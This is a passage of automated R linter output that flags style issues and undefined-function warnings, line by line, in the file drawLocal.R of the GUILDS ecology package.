+\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk <- k1[cnt]\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I)\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux\n^~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1 = which(x == 1)\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n                    ~^~~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif (length(idx1) > 0) {\n^\n```\n[R/drawLocal.R:11:11:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n                    ~^~~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n^~\n```\n[R/drawLocal.R:12:9:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n                  ~^~~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif (ymax < (y0 + 1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] <- Inf\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- 0\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] <- Inf\n^~~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  }\n^~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:19:30:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n                            ~^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp <- which((x > 0) & (x < 1))\n^\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n^~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx <- x[idxp]\n^\n```\n[R/drawLocal.R:21:20:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                   ^~~\n```\n[R/drawLocal.R:21:23:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                      ^\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~\n```\n[R/drawLocal.R:22:9:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:22:20:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                  ~^\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1 + 1)) {\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 <- (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I * xx + k) - lgamma(I * xx) +\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n^~\n```\n[R/drawLocal.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:25:28:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                          ~^\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1) * log(1 - xx) - log(xx)\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] <- aux\n^\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                     ^~~\n```\n[R/drawLocal.R:31:39:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L31) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                                      ^~~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L41) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                         ^\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                        ~^~\n```\n[R/drawLocal.R:41:60:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                                                          ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^\n```\n[R/drawLocal.R:47:10:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L47) *warning:* **no visible global function definition for ‘interp1’**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n         ^~~~~~~\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n            ~^~~\n```\n[R/drawLocal.R:47:27:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                         ~^~\n```\n[R/drawLocal.R:47:41:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                        ^~\n```\n[R/drawLocal.R:47:46:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                             ^~\n```\n[R/drawLocal.R:47:56:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                      ~^~\n```\n[R/drawLocal.R:47:75:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                                         ~^~\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/6b95966f7b559d84fca638b4c7f31c44d790098e/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, 